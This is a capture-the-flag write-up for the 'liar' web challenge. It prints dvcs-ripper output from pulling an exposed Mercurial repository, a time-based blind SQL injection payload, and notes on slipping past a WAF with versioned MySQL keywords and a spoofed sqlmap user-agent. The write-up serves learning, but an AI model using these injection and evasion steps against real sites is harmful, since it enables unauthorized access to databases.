$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/ [i] Downloading hg files from http://liar.inctf.in/.hg/ [i] Auto-detecting 404 as 200 with 3 requests [i] Getting correct 404 responses [d] found 00changelog.i [d] found dirstate [d] found requires [d] found branch [!] Not found for branchheads.cache: 404 Not Found [d] found last-message.txt [!] Not found for tags.cache: 404 Not Found [d] found undo.branch [d] found undo.desc [d] found undo.dirstate [d] found store/00changelog.i [!] Not found for store/00changelog.d: 404 Not Found [d] found store/00manifest.i [!] Not found for store/00manifest.d: 404 Not Found [d] found store/fncache [d] found store/undo [!] Not found for .hgignore: 404 Not Found [i] Running hg status to check for missing items [i] Got items with hg status: 3 [!] Not found for store/data/.hgignore.d: 404 Not Found [!] Not found for store/data/.hgignore.i: 404 Not Found [!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found [!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found [!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found [!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found [!] Not found for store/data/index.html.d: 404 Not Found [d] found store/data/index.html.i [i] Finished (1 of 4)
We can see there are other files on the web server (not available on the mercurial repository).
1 2 3 4
$ hg status ! .hgignore ! 1ts_h4rd_t0_gu3ss/index.html ! 1ts_h4rd_t0_gu3ss/vulnerable.php
1ts_h4rd_t0_gu3ss/index.html has a form that send to 1ts_h4rd_t0_gu3ss/vulnerable.php and there is a comment hidden in the sources
<!--Could You beat our security!!!--!> <!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>
So there is an SQL injection.
I tried manually to test if some stuff were filtered.
I saw that all SQL kerwords were detected by a WAF but using versionned keywords worked.
Then I tried with SQLmap but the WAF detected an automated tool so I told SQLmap to use a custom user-agent and to use my cookie.
Parameter: name (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
web server operating system: Linux Ubuntu web application technology: Nginx back-end DBMS: MySQL >= 5.0.12